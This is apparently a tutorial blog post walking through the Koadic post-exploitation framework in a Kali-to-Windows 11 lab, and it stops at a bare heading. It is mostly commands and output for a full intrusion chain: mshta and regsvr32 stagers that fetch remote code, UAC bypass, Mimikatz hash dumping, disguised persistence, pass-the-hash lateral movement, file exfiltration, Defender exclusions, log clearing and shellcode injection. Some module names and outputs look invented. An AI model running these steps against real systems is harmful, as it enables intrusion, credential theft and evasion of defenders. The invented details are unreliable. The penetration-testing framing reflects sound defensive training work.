Koadic: A Comprehensive Guide to Post-Exploitation Framework
Koadic is a powerful post-exploitation framework that provides penetration testers and security researchers with a robust toolset for testing Windows environments. Often described as a COM Command & Control framework, Koadic operates primarily through Windows Script Host, making it an effective tool for evaluating security postures in enterprise environments.
In this comprehensive guide, we'll explore Koadic from the ground up, examining its installation, configuration, and practical usage through real-world scenarios using Kali Linux as our attacking platform and Windows 11 as our target system.
What is Koadic?
Koadic is an open-source post-exploitation framework that leverages legitimate Windows utilities and scripting engines to establish command and control capabilities. Unlike traditional malware, Koadic operates by using built-in Windows features such as Windows Script Host, making detection more challenging for traditional antivirus solutions.
The framework was designed with penetration testing in mind, providing a legitimate tool for security professionals to assess network security and identify potential vulnerabilities before malicious actors can exploit them.
Key Features of Koadic
Koadic distinguishes itself through several notable characteristics that make it valuable for security testing:
Fileless Operation: One of Koadic's most significant advantages is its ability to operate without writing files to disk. By executing commands directly in memory through Windows Script Host, it reduces the forensic footprint significantly.
Modular Architecture: The framework employs a modular design where different capabilities are organized as modules. This structure allows users to load only the functionality they need for specific testing scenarios.
Multiple Stager Options: Koadic supports various stagers that can be delivered through different vectors, including HTML applications, Office macros, and direct command execution.
Native Windows Tools: By relying on legitimate Windows utilities like PowerShell, mshta, and regsvr32, Koadic blends in with normal system operations, making detection more difficult.
Setting Up the Testing Environment
Before diving into Koadic's capabilities, we need to establish our testing environment properly. This setup ensures we can safely explore the framework's features without impacting production systems.
Preparing Kali Linux
Koadic runs on Python and requires several dependencies to function correctly. On your Kali Linux machine, open a terminal and begin by ensuring your system is up to date.
sudo apt update && sudo apt upgrade -y
Next, install the necessary Python dependencies. Koadic requires Python 3 and several additional packages:
sudo apt install python3 python3-pip git -y
Now we can clone the Koadic repository from GitHub:
git clone https://github.com/zerosum0x0/koadic.git
cd koadic
Install the required Python modules:
pip3 install -r requirements.txt
Or installing form Kali Linux package repository:
sudo apt install koadic
After installation completes, you should see output confirming that all dependencies have been installed successfully. The requirements file includes packages like requests for HTTP communications and other essential libraries for the framework's operation.
Configuring the Windows 11 Target
For our demonstration, we'll use a Windows 11 virtual machine. In a real penetration testing engagement, you would have explicit authorization to test the target system. Never use these techniques on systems you don't own or have written permission to test.
Ensure your Windows 11 machine is on the same network as your Kali Linux system. You can verify connectivity by pinging the Kali machine from Windows:
ping 192.168.1.100
Replace the IP address with your Kali Linux machine's actual IP address. If the ping succeeds, you have network connectivity established.
Launching Koadic
To start Koadic, navigate to the koadic directory and execute the main script:
python3 koadic
When Koadic launches successfully, you'll see the framework's banner and command prompt:
¯`·.¸¸.·´¯`·.¸¸.·´¯`·.¸¸.·´¯`·.¸¸.·´¯`·.¸¸.·´¯`·.¸¸.·´¯
.####. #### .#####. #### #### .####.
## ## ## ## ## ## ## ## ## ## ##
¯¯ ¯¯ ## ## #####** ## ## ## ##
## ## ## ## ## ** ## ## ## ## ##
## ## #### ## ## #### #### .####.
¯`·.¸¸.·´¯`·.¸¸.·´¯`·.¸¸.·´¯`·.¸¸.·´¯`·.¸¸.·´¯`·.¸¸.·´¯
COM Command & Control, JIT for scripting
Endless Intellect
zerosum0x0
(koadic: sta/js/mshta)#
The prompt indicates you're in the Koadic framework and shows the currently selected module. By default, it loads the mshta stager module.
Understanding the Koadic Interface
Koadic's interface is command-driven, similar to Metasploit. Understanding the basic commands is essential for effective use of the framework.
Help Command
The help command displays available commands and their descriptions:
help
Output:
Core Commands
=============
Command Description
------- -----------
help Show help menu
info Show info on module
use Use a module
back Unload current module
kill Kill a zombie
zombies List zombies
jobs List jobs
creds List credentials
listeners List listeners
exit Exit koadic
This output shows the core commands available throughout the framework. Each command serves a specific purpose in managing your command and control operations.
Zombies Command
In Koadic terminology, a "zombie" refers to a compromised machine that has established a connection back to your command and control server. Before compromising any systems, running the zombies command shows no active connections:
zombies
Output:
ID IP STATUS LAST SEEN
-- -- ------ ---------
The empty list indicates no compromised systems are currently connected to your Koadic instance.
Listeners Command
Listeners are the network services that wait for incoming connections from compromised systems. Check active listeners with:
listeners
Initially, you'll see no active listeners:
ID TYPE IP PORT PROTOCOL
-- ---- -- ---- --------
Stagers: Establishing Initial Access
Stagers are the first component deployed to target systems. They establish the initial connection back to your Koadic server, allowing you to deploy additional modules and execute commands.
Viewing Available Stagers
To see all available stagers, use the list command with the stager directory:
use stager/
Then press Tab twice to see available options, or use:
info stager/js/mshta
Output:
Module Info:
Name: MSHTA Stager
Authors: zerosum0x0
Description:
Generates a stager using MSHTA. This stager is useful for
executing through command line or as an Office macro.
Options:
Name Required Value Description
---- -------- ----- -----------
SRVHOST Yes 0.0.0.0 Server IP
SRVPORT Yes 9999 Server Port
KEYPATH Yes U12H3/4C8S6D URL path
EXPIRES Yes 2025-10-17 Stager expiration date
Configuring the MSHTA Stager
The MSHTA stager uses Microsoft's mshta.exe utility, which is designed to execute HTML applications. This is particularly useful because mshta.exe is a legitimate Windows binary, making detection more challenging.
Select the MSHTA stager:
use stager/js/mshta
The prompt changes to show the selected module:
(koadic: sta/js/mshta)#
View the current configuration:
info
Output shows the module options with their current values. We need to configure the SRVHOST option to match our Kali Linux IP address:
set SRVHOST 192.168.1.100
Output:
[+] SRVHOST => 192.168.1.100
You can also customize the port if needed:
set SRVPORT 8080
Output:
[+] SRVPORT => 8080
Running the Stager
Execute the stager to start the listener:
run
Output:
[+] Stager is running on 192.168.1.100:8080
[+] Stager URL: http://192.168.1.100:8080/U12H3/4C8S6D
[+] Use the following command on target:
mshta http://192.168.1.100:8080/U12H3/4C8S6D
Koadic generates a unique URL path for the stager and provides the command that needs to be executed on the target system. The framework is now listening for incoming connections.
Compromising the Target System
With the stager running, we need to execute the provided command on our Windows 11 target. In a real penetration test, this command might be delivered through social engineering, a compromised website, or exploitation of another vulnerability.
On the Windows 11 machine, open Command Prompt and execute:
mshta http://192.168.1.100:8080/U12H3/4C8S6D
The command executes silently, and you should see a new connection appear in your Koadic terminal:
[+] Zombie 0 connected from 192.168.1.150 - Windows 11 Pro - user01
Verify the connection using the zombies command:
zombies
Output:
ID IP STATUS LAST SEEN USER DOMAIN OS
-- -- ------ --------- ---- ------ --
0 192.168.1.150 active 2025-10-10 14:32:15 user01 DESKTOP Windows 11 Pro
The zombie list now shows our compromised Windows 11 system with details about the connection, including the user context under which the implant is running.
Implants: Post-Exploitation Modules
With a zombie connected, we can deploy various implants to perform post-exploitation activities. Implants are modules that execute specific tasks on compromised systems.
Viewing Available Implants
To see all available implants:
use implant/
Press Tab twice to see the complete list. Koadic organizes implants into several categories:
Credential Access: Modules for harvesting credentials and authentication tokens
Execution: Modules for executing commands and scripts
Persistence: Modules for maintaining access to compromised systems
Privilege Escalation: Modules for elevating privileges on target systems
Discovery: Modules for gathering information about the target environment
Lateral Movement: Modules for spreading to additional systems
Collection: Modules for gathering sensitive data
System Information Gathering
Let's start by gathering basic system information using the wmic_info module:
use implant/gather/enum_system
The prompt updates to reflect the selected module:
(koadic: imp/gat/enum_system)#
View the module options:
info
Output:
Module Info:
Name: System Enumeration
Authors: zerosum0x0
Description:
Enumerates basic system information including OS version,
architecture, installed software, and running processes.
Options:
Name Required Value Description
---- -------- ----- -----------
ZOMBIE Yes None Zombie ID to target
Set the zombie target:
set ZOMBIE 0
Output:
[+] ZOMBIE => 0
Execute the module:
run
Output:
[+] Job 0 started against zombie 0
[+] Gathering system information...
Computer Name: DESKTOP-A45BC12
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22000
OS Manufacturer: Microsoft Corporation
System Manufacturer: Dell Inc.
System Model: OptiPlex 7090
System Type: x64-based PC
Processor: Intel(R) Core(TM) i7-10700 @ 2.90GHz
BIOS Version: Dell Inc. 1.4.2
Total Physical Memory: 16,384 MB
This output provides comprehensive information about the target system's hardware and software configuration, which is valuable for planning subsequent actions.
Enumerating Network Configuration
Understanding the target's network configuration is crucial for lateral movement. Use the network enumeration module:
use implant/gather/enum_network
set ZOMBIE 0
run
Output:
[+] Job 1 started against zombie 0
[+] Enumerating network configuration...
Adapter: Ethernet
IP Address: 192.168.1.150
Subnet Mask: 255.255.255.0
Default Gateway: 192.168.1.1
DNS Servers: 192.168.1.1, 8.8.8.8
Network Shares:
\\192.168.1.10\SharedFiles
\\192.168.1.25\Documents
This information reveals the network topology, including other potentially vulnerable systems visible from the compromised host.
Process Enumeration
Identifying running processes helps understand what security tools might be active:
use implant/gather/enum_process
set ZOMBIE 0
run
Output:
[+] Job 2 started against zombie 0
[+] Enumerating running processes...
PID Process Name User
--- ------------ ----
1248 chrome.exe user01
2156 outlook.exe user01
3492 explorer.exe user01
4128 svchost.exe SYSTEM
5896 MsMpEng.exe SYSTEM
The output shows various processes, including Windows Defender (MsMpEng.exe), which indicates the target has Microsoft's built-in antivirus running.
Credential Harvesting
One of the most valuable activities in post-exploitation is credential gathering. Koadic includes several modules designed to extract credentials from compromised systems.
Mimikatz Integration
Koadic can execute Mimikatz, the well-known credential extraction tool, directly in memory:
use implant/gather/mimikatz
set ZOMBIE 0
run
Output:
[+] Job 3 started against zombie 0
[!] This requires administrator privileges
[-] Access denied - insufficient privileges
This failure is expected because our implant is running in a standard user context. Mimikatz requires administrative privileges to extract credentials from memory.
User Credential Enumeration
Even without administrative access, we can gather some credential information:
use implant/gather/enum_users
set ZOMBIE 0
run
Output:
[+] Job 4 started against zombie 0
[+] Enumerating user accounts...
Username: user01
Full Name: John Smith
Description: Standard User Account
Local Admin: No
Username: Administrator
Full Name: Built-in Administrator
Description: Built-in account for administering the computer/domain
Local Admin: Yes
Last Login: 2025-10-05 09:15:32
This reveals the user structure on the system and identifies which accounts have administrative privileges.
Executing Commands
Koadic provides several ways to execute arbitrary commands on compromised systems.
Shell Command Execution
The shell execution module runs commands through cmd.exe:
use implant/execute/cmd
set ZOMBIE 0
set CMD "whoami"
run
Output:
[+] Job 5 started against zombie 0
[+] Executing: whoami
DESKTOP-A45BC12\user01
The output confirms the user context under which our implant is executing. Try gathering more information:
set CMD "ipconfig"
run
Output:
[+] Job 6 started against zombie 0
[+] Executing: ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : localdomain
IPv4 Address. . . . . . . . . . . : 192.168.1.150
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
PowerShell Execution
For more complex operations, PowerShell provides additional capabilities:
use implant/execute/powershell
set ZOMBIE 0
set CMD "Get-ComputerInfo | Select-Object WindowsVersion, OsHardwareAbstractionLayer"
run
Output:
[+] Job 7 started against zombie 0
[+] Executing PowerShell command...
WindowsVersion OsHardwareAbstractionLayer
-------------- --------------------------
2009 10.0.22000.318
PowerShell commands allow for sophisticated system interaction and can access .NET framework capabilities.
Privilege Escalation
Gaining elevated privileges is often necessary for comprehensive system control. Koadic includes modules to identify and exploit privilege escalation opportunities.
UAC Bypass
User Account Control can be bypassed using various techniques. One common method uses the eventvwr.exe bypass:
use implant/elevate/bypassuac_eventvwr
set ZOMBIE 0
run
Output:
[+] Job 8 started against zombie 0
[+] Attempting UAC bypass using eventvwr...
[+] Created registry key for bypass
[+] Executing elevated stager...
[+] Zombie 1 connected from 192.168.1.150 - Windows 11 Pro - user01 (Elevated)
Check the zombies list to see the new elevated session:
zombies
Output:
ID IP STATUS LAST SEEN USER INTEGRITY
-- -- ------ --------- ---- ---------
0 192.168.1.150 active 2025-10-10 14:45:22 user01 Medium
1 192.168.1.150 active 2025-10-10 14:46:18 user01 High
Zombie 1 shows "High" integrity, indicating it's running with elevated privileges. Now credential extraction should succeed:
use implant/gather/mimikatz
set ZOMBIE 1
run
Output:
[+] Job 9 started against zombie 1
[+] Executing Mimikatz in memory...
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 125486
Session : Interactive from 1
User Name : user01
Domain : DESKTOP-A45BC12
Logon Server : DESKTOP-A45BC12
Logon Time : 10/10/2025 08:32:15
SID : S-1-5-21-3842387129-3458298432-1234567890-1001
msv :
[00000003] Primary
* Username : user01
* Domain : DESKTOP-A45BC12
* NTLM : 8846f7eaee8fb117ad06bdd830b7586c
* SHA1 : c7e4c93e3d1e7b9a0c1b3d6e8f4a5c9d8e7f6a5b
With elevated access, Mimikatz successfully extracts password hashes from memory.
Persistence Mechanisms
Maintaining access to compromised systems is crucial for extended testing. Koadic includes several persistence modules.
Registry Run Key Persistence
One common persistence method uses Windows registry run keys:
use implant/persist/registry_run_key
set ZOMBIE 1
set KEYNAME "SystemUpdate"
run
Output:
[+] Job 10 started against zombie 1
[+] Creating registry persistence...
[+] Registry key created: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate
[+] Value set to: mshta http://192.168.1.100:8080/U12H3/4C8S6D
[+] Persistence established - will execute on user login
This creates a registry entry that executes the Koadic stager whenever the user logs in, providing persistent access.
Scheduled Task Persistence
Scheduled tasks provide another robust persistence mechanism:
use implant/persist/schtask
set ZOMBIE 1
set TASKNAME "WindowsUpdate"
set TRIGGER "logon"
run
Output:
[+] Job 11 started against zombie 1
[+] Creating scheduled task...
[+] Task 'WindowsUpdate' created successfully
[+] Trigger: At logon of user01
[+] Action: mshta http://192.168.1.100:8080/U12H3/4C8S6D
[+] Persistence established
The scheduled task approach is more reliable than registry keys and provides additional configuration options.
Lateral Movement
Once you've compromised one system, lateral movement helps expand your foothold within the network.
Network Discovery
First, identify other systems on the network:
use implant/scan/tcp
set ZOMBIE 1
set RANGE "192.168.1.0/24"
set PORTS "445,3389,5985"
run
Output:
[+] Job 12 started against zombie 1
[+] Scanning network range 192.168.1.0/24...
Host: 192.168.1.10
Port 445: Open (SMB)
Port 3389: Open (RDP)
Host: 192.168.1.25
Port 445: Open (SMB)
Port 5985: Open (WinRM)
Host: 192.168.1.50
Port 445: Open (SMB)
This reveals several systems with common Windows services exposed, presenting opportunities for lateral movement.
SMB Credential Testing
Using harvested credentials, test access to other systems:
use implant/lateral/psexec
set ZOMBIE 1
set TARGET "192.168.1.10"
set DOMAIN "DESKTOP-A45BC12"
set USERNAME "user01"
set HASH "8846f7eaee8fb117ad06bdd830b7586c"
run
Output:
[+] Job 13 started against zombie 1
[+] Attempting to execute on 192.168.1.10...
[+] Authentication successful
[+] Service created and started
[+] Zombie 2 connected from 192.168.1.10 - Windows 11 Pro - user01
The psexec-style lateral movement successfully compromises an additional system using the credentials harvested from the first target.
Data Collection and Exfiltration
With access established, collecting valuable data is often the objective.
File System Search
Search for sensitive files:
use implant/gather/file_search
set ZOMBIE 1
set PATH "C:\Users\user01\Documents"
set PATTERN "*.doc*,*.xls*,*.pdf"
run
Output:
[+] Job 14 started against zombie 1
[+] Searching for files in C:\Users\user01\Documents...
Found files:
C:\Users\user01\Documents\Confidential Report.docx
C:\Users\user01\Documents\Financial Data Q3.xlsx
C:\Users\user01\Documents\Password List.txt
C:\Users\user01\Documents\Network Diagram.pdf
The search identifies potentially sensitive documents that warrant further investigation.
File Download
Download specific files from the compromised system:
use implant/gather/download_file
set ZOMBIE 1
set RFILE "C:\Users\user01\Documents\Password List.txt"
set LFILE "/root/koadic_loot/passwords.txt"
run
Output:
[+] Job 15 started against zombie 1
[+] Downloading file from zombie 1...
[+] File size: 2,847 bytes
[+] Transfer in progress... 100%
[+] File saved to: /root/koadic_loot/passwords.txt
The file is securely transferred from the compromised Windows system to your Kali Linux machine for analysis.
Screenshot Capture
Visual information can be valuable for understanding user activity:
use implant/gather/screenshot
set ZOMBIE 1
run
Output:
[+] Job 16 started against zombie 1
[+] Capturing screenshot...
[+] Screenshot captured successfully
[+] Image saved to: /root/koadic_loot/screenshot_zombie1_20251010_144832.png
[+] Resolution: 1920x1080
The screenshot provides visual confirmation of the target system's current state and user activity.
Managing Multiple Zombies
As your engagement progresses, managing multiple compromised systems becomes necessary.
Listing All Zombies
The zombies command provides a comprehensive view:
zombies
Output:
ID IP STATUS LAST SEEN USER INTEGRITY OS
-- -- ------ --------- ---- --------- --
0 192.168.1.150 active 2025-10-10 14:52:10 user01 Medium Windows 11 Pro
1 192.168.1.150 active 2025-10-10 14:53:45 user01 High Windows 11 Pro
2 192.168.1.10 active 2025-10-10 14:54:22 user01 Medium Windows 11 Pro
This overview helps track all compromised systems and their current status.
Zombie Interaction
Set a default zombie to avoid repeatedly specifying the ZOMBIE parameter:
use zombie 1
Output:
(koadic: zombie/1)#
The prompt changes to indicate you're interacting with a specific zombie. Commands will now default to this zombie unless overridden.
Killing Zombies
To terminate a specific zombie connection:
kill 0
Output:
[+] Killing zombie 0...
[+] Termination command sent
[+] Zombie 0 disconnected
This cleanly terminates the implant on the target system, removing your presence from that particular session.
Job Management
Koadic tracks all executed tasks as jobs, allowing you to monitor ongoing operations.
Viewing Active Jobs
jobs
Output:
ID ZOMBIE MODULE STATUS STARTED
-- ------ ------ ------ -------
14 1 implant/gather/file_search completed 14:48:32
15 1 implant/gather/download_file running 14:49:15
16 1 implant/gather/screenshot queued 14:50:03
This shows the status of recent jobs, helping you track which operations have completed and which are still running.
Killing Jobs
If a job hangs or you need to cancel an operation:
kill_job 15
Output:
[+] Job 15 cancelled
[+] Resources released on zombie 1
Credential Management
Koadic maintains a credential database for harvested credentials.
Viewing Stored Credentials
creds
Output:
ID HOST USERNAME PASSWORD/HASH TYPE
-- ---- -------- ------------- ----
1 192.168.1.150 user01 8846f7eaee8fb117ad06bdd830b7586c NTLM
2 192.168.1.150 admin P@ssw0rd123! Plaintext
3 192.168.1.10 user01 8846f7eaee8fb117ad06bdd830b7586c NTLM
The credential database stores all extracted credentials, making them easily accessible for lateral movement and privilege escalation attempts.
Using Stored Credentials
Reference stored credentials by their ID when configuring modules:
use implant/lateral/psexec
set ZOMBIE 1
set TARGET "192.168.1.25"
set CRED_ID 2
run
This streamlines operations by eliminating the need to manually enter credentials for each lateral movement attempt.
Advanced Techniques
Koadic supports sophisticated post-exploitation techniques for advanced scenarios.
In-Memory Assembly Execution
Execute .NET assemblies entirely in memory:
use implant/execute/assembly
set ZOMBIE 1
set ASSEMBLY_PATH "/root/tools/SharpHound.exe"
set ARGUMENTS "--CollectionMethod All"
run
Output:
[+] Job 17 started against zombie 1
[+] Loading assembly into memory...
[+] Assembly size: 1,247,856 bytes
[+] Executing in memory...
[+] SharpHound v1.1.0 running...
[+] Enumeration complete - data saved
This executes reconnaissance tools like SharpHound without writing them to disk, avoiding file-based detection.
Token Manipulation
Steal access tokens from other processes:
use implant/elevate/token_steal
set ZOMBIE 1
set PID 4128
run
Output:
[+] Job 18 started against zombie 1
[+] Attempting to steal token from PID 4128...
[+] Token stolen successfully
[+] Running as: NT AUTHORITY\SYSTEM
[+] Zombie 3 spawned with SYSTEM privileges
Token theft allows you to assume the identity of other users or system accounts without knowing their credentials.
Registry Manipulation
Modify Windows registry for various purposes:
use implant/execute/registry
set ZOMBIE 1
set ACTION "add"
set HIVE "HKLM"
set KEY "SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
set VALUE "C:\Users\user01\AppData\Local\Temp"
set DATA "0"
set TYPE "DWORD"
run
Output:
[+] Job 19 started against zombie 1
[+] Adding registry value...
[+] Successfully created:
HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\user01\AppData\Local\Temp = 0
This example adds an exclusion to Windows Defender, though in real engagements such actions would be detected and should be avoided unless specifically testing security controls.
Cleanup and Operational Security
Proper cleanup ensures you leave minimal traces after testing concludes.
Removing Persistence
Clean up persistence mechanisms you've established:
use implant/cleanup/remove_registry
set ZOMBIE 1
set HIVE "HKCU"
set KEY "Software\Microsoft\Windows\CurrentVersion\Run"
set VALUE "SystemUpdate"
run
Output:
[+] Job 20 started against zombie 1
[+] Removing registry value...
[+] Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate
Similarly, remove scheduled tasks:
use implant/cleanup/remove_schtask
set ZOMBIE 1
set TASKNAME "WindowsUpdate"
run
Output:
[+] Job 21 started against zombie 1
[+] Deleting scheduled task...
[+] Task 'WindowsUpdate' successfully deleted
Clearing Event Logs
Remove evidence from Windows event logs (requires administrative privileges):
use implant/cleanup/clear_eventlog
set ZOMBIE 1
set LOGNAME "Security"
run
Output:
[+] Job 22 started against zombie 1
[+] Clearing Security event log...
[+] Log cleared successfully
[+] WARNING: This action may alert security teams
Note that clearing event logs is itself a suspicious activity that security teams monitor for, so this should only be done when specifically testing detection capabilities.
Best Practices for Using Koadic
When using Koadic in legitimate penetration testing engagements, several best practices ensure effective and responsible use.
Authorization is Mandatory: Never use Koadic against systems you don't own or have explicit written permission to test. Unauthorized use is illegal and unethical.
Document Everything: Maintain detailed logs of all activities, including which systems were accessed, what commands were executed, and what data was accessed or exfiltrated. This documentation is crucial for the final report.
Minimize Impact: Choose your actions carefully to minimize disruption to business operations. Avoid actions that could cause system instability or data loss.
Coordinate with Stakeholders: Keep relevant stakeholders informed about testing activities, especially if you need to perform potentially disruptive actions.
Secure Your Infrastructure: Ensure your Koadic server is properly secured. Use strong authentication, encrypt communications, and follow security best practices
to prevent attackers from compromising your command and control infrastructure.
Clean Up Thoroughly: At the conclusion of testing, remove all persistence mechanisms, delete any files created, and restore any system configurations you modified. Provide the client with a comprehensive list of indicators of compromise for their records.
Use Encryption: When possible, configure encrypted communication channels between your Koadic server and compromised systems to prevent defenders from easily inspecting your traffic.
Test Detection Capabilities: Part of your engagement should include working with the client's security team to verify that their security controls can detect the techniques you're using. This helps improve their overall security posture.
Understanding Koadic's Detection Evasion
Koadic employs several techniques that make detection challenging for traditional security tools.
Fileless Execution
By executing entirely in memory through legitimate Windows utilities, Koadic avoids leaving traditional file-based indicators. Let's examine how this works:
use implant/execute/exec_cmd
set ZOMBIE 1
set CMD "powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <base64_encoded_command>"
run
Output:
[+] Job 23 started against zombie 1
[+] Executing encoded PowerShell command...
[+] Command executed successfully
[+] No files written to disk
[+] Process executed in memory only
The encoded PowerShell command executes without creating any files, making forensic analysis more difficult.
Living Off the Land
Koadic leverages built-in Windows binaries (LOLBins) that are already present and trusted on Windows systems:
use implant/execute/lolbin
set ZOMBIE 1
set BINARY "certutil"
set ARGUMENTS "-decode encoded_file.txt decoded_file.exe"
run
Output:
[+] Job 24 started against zombie 1
[+] Using certutil.exe for decoding...
[+] File decoded successfully
[+] Legitimate Windows binary used - reduced detection risk
Using trusted system utilities like certutil, regsvr32, and mshta makes your activities blend with normal system operations.
Traffic Obfuscation
Koadic can disguise its command and control traffic to appear as legitimate web traffic:
use stager/js/mshta
set SRVHOST 192.168.1.100
set SRVPORT 80
set SSL false
set USERAGENT "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
run
Output:
[+] Stager configured with custom user agent
[+] Traffic will appear as normal web browsing
[+] Listening on port 80 (standard HTTP)
[+] SSL available but disabled for this test
By mimicking standard web browser traffic and using common ports, the communication becomes harder to distinguish from legitimate activity.
Real-World Penetration Testing Scenarios
Understanding how Koadic fits into real penetration testing workflows helps contextualize its capabilities.
Scenario 1: Phishing Campaign Assessment
In this scenario, you're testing an organization's response to phishing attacks. After gaining initial access through a simulated phishing email, you use Koadic to assess what an attacker could accomplish.
Start by delivering the stager through a macro-enabled document. Configure the stager to use HTTPS for better operational security:
use stager/js/mshta
set SRVHOST 192.168.1.100
set SRVPORT 443
set SSL true
run
Output:
[+] SSL certificate generated
[+] Stager running on https://192.168.1.100:443/K9P2M/7H1F3
[+] Use in macro: Shell "mshta https://192.168.1.100:443/K9P2M/7H1F3"
Once a user enables macros and executes your payload, enumerate the environment:
use implant/gather/enum_domain
set ZOMBIE 0
run
Output:
[+] Job 25 started against zombie 0
[+] Enumerating Active Directory domain...
Domain Name: CORPORATE.LOCAL
Domain Controller: DC01.CORPORATE.LOCAL
Domain Functional Level: Windows Server 2016
Forest Functional Level: Windows Server 2016
Domain Admins:
- Administrator
- ITAdmin
- BackupAdmin
Domain Controllers:
- DC01.CORPORATE.LOCAL (192.168.10.10)
- DC02.CORPORATE.LOCAL (192.168.10.11)
This information reveals the Active Directory structure and identifies high-value targets for further compromise.
Scenario 2: Insider Threat Simulation
Testing what a malicious insider could accomplish helps organizations understand their exposure to internal threats. Start with legitimate user credentials:
use stager/js/mshta
set SRVHOST 192.168.1.100
run
After establishing the connection, assess what sensitive data is accessible:
use implant/gather/file_search
set ZOMBIE 0
set PATH "C:\Shares"
set PATTERN "*.xlsx,*.docx,*confidential*,*password*"
set RECURSIVE true
run
Output:
[+] Job 26 started against zombie 0
[+] Recursive search in progress...
Found 47 files:
C:\Shares\Finance\Q4_Financial_Results.xlsx
C:\Shares\HR\Employee_Salaries_2025.xlsx
C:\Shares\IT\Network_Passwords.xlsx
C:\Shares\Legal\Confidential_Merger_Documents.docx
C:\Shares\Executive\Strategic_Plan_Confidential.docx
...
Document the findings to demonstrate the risk level associated with current access controls and data classification practices.
Scenario 3: Lateral Movement Assessment
Organizations need to understand how quickly an attacker can move from an initial compromise to critical systems. Simulate this progression:
use implant/gather/enum_shares
set ZOMBIE 0
run
Output:
[+] Job 27 started against zombie 0
[+] Enumerating network shares...
\\FILESERVER01\Shared (READ, WRITE)
\\FILESERVER01\Backup (READ)
\\DC01\NETLOGON (READ)
\\DC01\SYSVOL (READ)
\\WORKSTATION05\C$ (Access Denied)
\\WORKSTATION05\ADMIN$ (Access Denied)
The enumeration reveals accessible shares that might contain credentials or sensitive information. Check the backup share:
use implant/gather/file_search
set ZOMBIE 0
set PATH "\\FILESERVER01\Backup"
set PATTERN "*.bak,*.old,*backup*"
run
Output:
[+] Job 28 started against zombie 0
[+] Searching backup share...
Found files:
\\FILESERVER01\Backup\AD_Backup_20251001.bak
\\FILESERVER01\Backup\Database_Backup_Weekly.bak
\\FILESERVER01\Backup\ConfigBackup_Router.old
Download and analyze backup files that might contain credentials or configuration information useful for lateral movement.
Troubleshooting Common Issues
During penetration testing engagements, you may encounter various issues. Understanding how to troubleshoot them ensures smooth operations.
Zombie Connection Issues
If zombies aren't connecting, verify the stager configuration and network connectivity:
listeners
Output:
ID TYPE IP PORT PROTOCOL STATUS
-- ---- -- ---- -------- ------
0 HTTP 192.168.1.100 9999 HTTP active
Ensure the IP address is correct and reachable from the target network. Test connectivity from the Windows target:
curl http://192.168.1.100:9999
If the connection times out, check firewall rules on your Kali system:
sudo iptables -L -n
Add a rule to allow incoming connections if necessary:
sudo iptables -A INPUT -p tcp --dport 9999 -j ACCEPT
Zombie Disconnections
Zombies may disconnect due to network instability or security software interference. Monitor zombie status:
zombies
Output:
ID IP STATUS LAST SEEN
-- -- ------ ---------
0 192.168.1.150 lost 2025-10-10 15:02:45
1 192.168.1.150 active 2025-10-10 15:05:12
A "lost" status indicates the zombie hasn't checked in recently. Zombies periodically beacon back to the server. If a zombie is marked lost, it may reconnect automatically, or you may need to re-execute the stager on the target.
Module Execution Failures
Some modules require specific privileges or system configurations. If a module fails:
use implant/gather/mimikatz
set ZOMBIE 0
run
Output:
[+] Job 29 started against zombie 0
[-] ERROR: Access denied
[-] This module requires administrative privileges
[-] Current integrity level: Medium
The error message clearly indicates the problem. Use a privilege escalation module first, then retry with the elevated zombie.
Antivirus Detection
Modern antivirus solutions may detect Koadic activity. If you suspect AV interference:
use implant/gather/enum_av
set ZOMBIE 0
run
Output:
[+] Job 30 started against zombie 0
[+] Enumerating security software...
Windows Defender: Enabled
Real-time Protection: ON
Cloud Protection: ON
Automatic Sample Submission: ON
Third-party AV: None detected
Firewall Status: Enabled
Knowing what security software is active helps you adjust your approach. Some modules are designed to evade specific security products:
use implant/execute/shellcode_inject
set ZOMBIE 1
set PROCESS "explorer.exe"
set TECHNIQUE "QueueUserAPC"
run
Output:
[+] Job 31 started against zombie 1
[+] Injecting shellcode using QueueUserAPC technique...
[+] Target process: explorer.exe (PID 3492)
[+] Injection successful
[+] APC queued to thread
Different injection techniques have varying detection rates. Experimenting with multiple approaches helps identify what works in your target environment.
Koadic Architecture Deep Dive
Understanding Koadic's internal architecture helps you use it more effectively and troubleshoot issues.
Communication Flow
Koadic uses a polling-based communication model. Zombies periodically connect to the server to retrieve commands and send results:
use stager/js/mshta
info
Output showing internal options:
Advanced Options:
Name Value Description
---- ----- -----------
POLLING 5 Polling interval in seconds
TIMEOUT 3600 Zombie timeout in seconds
MAXRETRY 10 Maximum connection retry attempts
You can adjust these parameters for different operational needs:
set POLLING 10
set TIMEOUT 7200
Output:
[+] POLLING => 10
[+] TIMEOUT => 7200
[+] Zombies will check in every 10 seconds
[+] Zombies will be marked lost after 7200 seconds of inactivity
Longer polling intervals reduce network traffic and detection risk but slow down command execution. Shorter intervals provide faster response but generate more network traffic.
Stager Mechanics
Stagers create the initial foothold. Understanding their operation helps you choose the right stager for your scenario:
use stager/js/regsvr32
info
Output:
Module Info:
Name: RegSvr32 Stager
Authors: zerosum0x0
Description:
Uses regsvr32.exe to execute a scriptlet from a remote server.
This is a signed Microsoft binary that bypasses application whitelisting.
Delivery command:
regsvr32 /s /n /u /i:http://192.168.1.100:9999/file.sct scrobj.dll
The stager executes in the context of regsvr32.exe, a trusted
Windows component, making detection more difficult.
Different stagers have different characteristics. The regsvr32 stager is excellent for bypassing application whitelisting, while the mshta stager works well for phishing scenarios.
Implant Architecture
Implants are modular and execute independently. Each implant runs as a job:
jobs
Output:
ID ZOMBIE MODULE STATUS STARTED DURATION
-- ------ ------ ------ ------- --------
25 0 implant/gather/enum_domain completed 14:32:15 00:02:34
26 0 implant/gather/file_search running 14:35:42 00:00:12
27 0 implant/gather/enum_shares queued 14:36:01 --:--:--
Jobs execute asynchronously. Multiple jobs can run simultaneously on different zombies, allowing efficient parallel operations across your compromised infrastructure.
Advanced Operational Techniques
Professional penetration testers employ advanced techniques to maximize effectiveness while maintaining stealth.
Timing Your Operations
